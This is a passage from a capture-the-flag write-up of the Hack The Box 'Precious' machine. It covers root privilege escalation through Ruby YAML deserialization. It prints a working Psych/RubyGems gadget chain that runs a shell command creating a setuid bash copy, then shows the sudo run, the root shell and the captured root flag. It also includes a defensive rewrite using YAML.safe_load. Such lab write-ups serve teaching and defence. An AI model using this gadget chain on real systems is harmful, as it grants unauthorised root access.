  gems_local.each do |local_name, local_version|
    if(file_name == local_name)
      if(file_version != local_version)
        puts "Installed version differs from the one specified in file: " + local_name
      else
        puts "Installed version is equals to the one specified in file: " + local_name
      end
    end
  end
end
henry@precious:~$

16. We can escalate privileges by supplying our own dependencies.yml file, but I can't write Ruby and am not familiar with the language, so I followed the reference writeup directly

---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: cp /bin/bash /tmp/shiyan; chmod 6777 /tmp/shiyan
method_id: :resolve
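Two things in /opt/update_dependencies.rb combine here: list_from_file reads "dependencies.yml" relative to whatever directory sudo is invoked from, and it parses that file with YAML.load, which on the box's Ruby 2.7 instantiates any class named by a !ruby/object tag (the document above is a chain of such tags). The Ruby below is an added example, not the box's script, of how list_from_file looks with YAML.safe_load and a fixed path; DEPENDENCIES_PATH, check_yaml_text, load_from_text and the three sample documents are assumptions of this example.

```ruby
require "yaml"
require "tempfile"

# Added example, not the box's /opt/update_dependencies.rb. The original
# list_from_file calls YAML.load on "dependencies.yml" from the current
# directory; on Ruby 2.7 YAML.load instantiates whatever class a
# !ruby/object tag names. This version differs in two ways, both of them
# assumptions: it parses with YAML.safe_load, and it reads a fixed path so
# the caller's working directory no longer chooses the file root parses.

DEPENDENCIES_PATH = "/opt/dependencies.yml"   # assumed location

def list_from_file(path = DEPENDENCIES_PATH)
  doc = YAML.safe_load(File.read(path), permitted_classes: [], aliases: false)
  raise ArgumentError, "dependencies.yml must be a mapping" unless doc.is_a?(Hash)
  doc.each do |name, version|
    # Versions such as 3.0 would parse as a Float; require quoted strings.
    unless name.is_a?(String) && version.is_a?(String)
      raise ArgumentError, "bad entry for #{name.inspect}"
    end
  end
  doc
end

# Classify a document the way a reviewer of such files would:
# :ok for plain data, :rejected when safe_load refuses a tag or alias,
# :malformed for a YAML syntax error.
def check_yaml_text(text)
  YAML.safe_load(text, permitted_classes: [], aliases: false)
  :ok
rescue Psych::DisallowedClass, Psych::BadAlias
  :rejected
rescue Psych::SyntaxError
  :malformed
end

# Write constructed text to a temporary file and load it through
# list_from_file, so the path-based function can be exercised offline.
def load_from_text(text)
  Tempfile.create("dependencies") do |f|
    f.write(text)
    f.flush
    list_from_file(f.path)
  end
end

# Constructed samples (not files from the box): a legitimate mapping, a
# document using a !ruby/object tag with no payload, and one using an alias.
BENIGN_YAML = "---\nsinatra: 3.0.0\npdfkit: 0.8.6\n"
TAGGED_YAML = "---\n- !ruby/object:Gem::Installer\n  i: x\n"
ALIAS_YAML  = "---\na: &ref 1\nb: *ref\n"

if __FILE__ == $PROGRAM_NAME
  [BENIGN_YAML, TAGGED_YAML, ALIAS_YAML].each do |doc|
    puts "#{doc.lines.first(2).join.inspect} -> #{check_yaml_text(doc)}"
  end
end
```

safe_load raises Psych::DisallowedClass as soon as it meets the first tag, before any object is constructed, and with aliases disabled the anchors the chain relies on are refused as well. Pinning the path removes the other half of the problem, which is that the sudo rule lets henry choose the working directory. On Ruby 3.1 and later (Psych 4) YAML.load is itself safe_load by default, but the traceback in the next step shows /usr/lib/ruby/2.7.0/psych.rb, where it is not.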

17. Next, we try the exploit and obtain the final flag

henry@precious:~$ cd /opt/
henry@precious:/opt$ ls
sample update_dependencies.rb
henry@precious:/opt$ ls -la
total 16
drwxr-xr-x 3 root root 4096 Oct 26 2022 .
drwxr-xr-x 18 root root 4096 Nov 21 2022 ..
drwxr-xr-x 2 root root 4096 Oct 26 2022 sample
-rwxr-xr-x 1 root root 848 Sep 25 2022 update_dependencies.rb
henry@precious:/opt$ touch dependencies.yml
touch: cannot touch 'dependencies.yml': Permission denied
henry@precious:/opt$ cd /tmp
henry@precious:/tmp$ ls
passenger.kCXMasI
runtime-ruby
systemd-private-53b6be14bf5c49bf890a413f1840c4c8-systemd-logind.service-FqYTxg
vmware-root_401-1857883248
henry@precious:/tmp$ touch dependencies.yml
henry@precious:/tmp$ vim dependencies.yml
-bash: vim: command not found
henry@precious:/tmp$ vi dependencies.yml
henry@precious:/tmp$ sudo -l
Matching Defaults entries for henry on precious:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:/tmp$ sudo ruby /opt/update_dependencies.rb
sh: 1: reading: not found
Traceback (most recent call last):
33: from /opt/update_dependencies.rb:17:in `<main>'
32: from /opt/update_dependencies.rb:10:in `list_from_file'
31: from /usr/lib/ruby/2.7.0/psych.rb:279:in `load'
30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in `to_ruby'
29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in `visit_Psych_Nodes_Document'
25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in `visit_Psych_Nodes_Sequence'
21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `register_empty'
20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `each'
19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `block in register_empty'
18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in `visit_Psych_Nodes_Mapping'
14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in `revive'
13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in `init_with'
12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in `init_with'
11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in `yaml_initialize'
10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in `fix_syck_default_key_in_requirements'
9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in `each'
8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in `from'
7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in `read'
6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in `LOG'
5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'
4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in `resolve'
2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'
1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system': no implicit conversion of nil into String (TypeError)
henry@precious:/tmp$ ls -la
total 1256
drwxrwxrwt 11 root root 4096 Dec 29 04:32 .
drwxr-xr-x 18 root root 4096 Nov 21 2022 ..
-rw-r--r-- 1 henry henry 647 Dec 29 04:32 dependencies.yml
drwxrwxrwt 2 root root 4096 Dec 29 02:44 .font-unix
drwxrwxrwt 2 root root 4096 Dec 29 02:44 .ICE-unix
drwxr-xr-x 5 root root 4096 Dec 29 03:44 passenger.kCXMasI
drwx------ 2 ruby ruby 4096 Dec 29 02:59 runtime-ruby
-rwsrwsrwx 1 root root 1234376 Dec 29 04:32 shiyan
drwx------ 3 root root 4096 Dec 29 02:44 systemd-private-53b6be14bf5c49bf890a413f1840c4c8-systemd-logind.service-FqYTxg
drwxrwxrwt 2 root root 4096 Dec 29 02:44 .Test-unix
drwx------ 2 root root 4096 Dec 29 02:44 vmware-root_401-1857883248
drwxrwxrwt 2 root root 4096 Dec 29 02:44 .X11-unix
drwxrwxrwt 2 root root 4096 Dec 29 02:44 .XIM-unix
henry@precious:/tmp$ shiyan -p
-bash: shiyan: command not found
henry@precious:/tmp$ ./shiyan -p
shiyan-5.1# id
uid=1000(henry) gid=1000(henry) euid=0(root) egid=0(root) groups=0(root),1000(henry)
shiyan-5.1# cat /root/root.txt
68916c4ed77ad356f7217b51bb3b984f
shiyan-5.1#

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/513


Precious-htb-writeup
https://sh1yan.top/2023/12/29/Precious-htb-writeup/
Author: shiyan
Published: 2023-12-29